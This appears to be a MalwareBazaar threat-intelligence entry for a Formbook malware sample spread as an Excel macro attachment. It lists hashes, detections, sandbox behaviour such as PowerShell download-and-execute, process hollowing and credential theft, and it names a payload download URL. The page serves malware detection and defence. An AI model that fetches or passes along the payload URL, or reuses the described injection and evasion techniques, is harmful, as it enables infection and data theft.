MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Formbook


Vendor detections: 6


Intelligence 6 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4
SHA3-384 hash: 8f1d3ab09ceb8e3b0cd2bad42ae1856824b1ef49512c6b1226f36f18879f79e139b055211e7854a55752d8494782dcc2
SHA1 hash: 90ef404e139164b266d553a5e094b01c0e810b4f
MD5 hash: d89a828241cd67ebdc96a905e5924f24
humanhash: sierra-bravo-april-winter
File name:PO-0715.xlsm
Download: download sample
Signature Formbook
Create hunting rule
File size:94'837 bytes
First seen:2020-07-19 09:40:52 UTC
Last seen:2020-07-26 11:32:34 UTC
File type:Excel file xlsm
MIME type:application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep 1536:I9Xdg7zjhJFdTI4uZNMNhC0br1j0EeewkHergIaYtaBQmxcC6VmIjYobFzM4yedA:SXi7z9JFtI2hC0bZUewkaANCzpzr2PUy
TLSH 999302C9246AD813C3FE957C12AB4149E88A60FE50EA8B285D90736564E0FC74D5F4FE
Reporter abuse_ch
Tags:FormBook xlsm


Avatar
abuse_ch
Formbook payload URL:
http://ventos.xyz/hen.exe

Intelligence

File Origin
# of uploads :
3
# of downloads :
75
Origin country :
n/a
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Trojan-Downloader.MSOffice.SLoad.gen.20813.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a window
Unauthorized injection to a recently created process
Sending an HTTP GET request
Creating a file in the %temp% subdirectories
Reading critical registry keys
Creating a file
Deleting a recently created file
Reading Telegram data
Running batch commands
Creating a process with a hidden window
Launching a process
Sending a TCP request to an infection source
Stealing user critical data
Result
Threat name:
FormBook
Create hunting rule
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/389691
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 247019 Sample: PO-0715.xlsm Startdate: 19/07/2020 Architecture: WINDOWS Score: 100 46 cdn.onenote.net 2->46 48 www.heatingevansville.com 2->48 58 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->58 60 Multi AV Scanner detection for domain / URL 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 8 other signatures 2->64 13 EXCEL.EXE 184 47 2->13         started        signatures3 process4 file5 42 C:\Users\user\Desktop\~$PO-0715.xlsm, data 13->42 dropped 84 Suspicious powershell command line found 13->84 86 Tries to download and execute files (via powershell) 13->86 88 Document exploit detected (process start blacklist hit) 13->88 17 powershell.exe 15 21 13->17         started        signatures6 process7 dnsIp8 44 ventos.xyz 185.125.230.195, 49739, 80 IHOR-ASRU Russian Federation 17->44 40 C:\Users\user\AppData\Local\Temp\putty.exe, PE32 17->40 dropped 66 Powershell drops PE file 17->66 22 putty.exe 1 17->22         started        25 conhost.exe 17->25         started        file9 signatures10 process11 signatures12 68 Antivirus detection for dropped file 22->68 70 Multi AV Scanner detection for dropped file 22->70 72 Machine Learning detection for dropped file 22->72 74 2 other signatures 22->74 27 putty.exe 22->27         started        process13 signatures14 76 Modifies the context of a thread in another process (thread injection) 27->76 78 Maps a DLL or memory area into another process 27->78 80 Sample uses process hollowing technique 27->80 82 Queues an APC in another process (thread injection) 27->82 30 explorer.exe 27->30 injected process15 dnsIp16 50 www.starbaby-bohum.com 30->50 33 help.exe 30->33         started        process17 signatures18 52 Modifies the context of a thread in another process (thread injection) 33->52 54 Maps a DLL or memory area into another process 33->54 56 Tries to detect virtualization through RDTSC time measurements 33->56 36 cmd.exe 1 33->36         started        process19 process20 38 conhost.exe 36->38         started       
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4/
Threat name:
Script-Macro.Downloader.Obfuser
Create hunting rule
Status:
Malicious
First seen:
2020-07-19 09:42:06 UTC
AV detection:
17 of 29 (58.62%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=3ud6jmrfrfg2qrxsqrlgcggmzfvcvk6ksdbegn7tnxomobto532a._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
n/a
Link:
https://tria.ge/reports/200719-pta9zktkpa/
Behaviour
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetThreadContext
Checks whether UAC is enabled
Loads dropped DLL
Blacklisted process makes network request
Executes dropped EXE
Blacklisted process makes network request
Executes dropped EXE
Process spawned unexpected child process
Process spawned unexpected child process
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Unknown
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:SharedStrings
Create hunting rule
Author:Katie Kleemola
Description:Internal names found in LURK0/CCTV0 samples

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

Formbook

Excel file xlsm dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4

(this sample)

Formbook

Executable exe 5d8b65f8c8dbafc49e02925b7caee33bf456f0aa396c5dabaf526578ff4a6a5c

  
URLhaus
https://urlhaus.abuse.ch/url/414923/
  
Delivery method
Distributed via e-mail attachment
  
Dropping
SHA256 5d8b65f8c8dbafc49e02925b7caee33bf456f0aa396c5dabaf526578ff4a6a5c
  
Dropping
MD5 bb998dd32f512428403a4cbae8a77b3b

Comments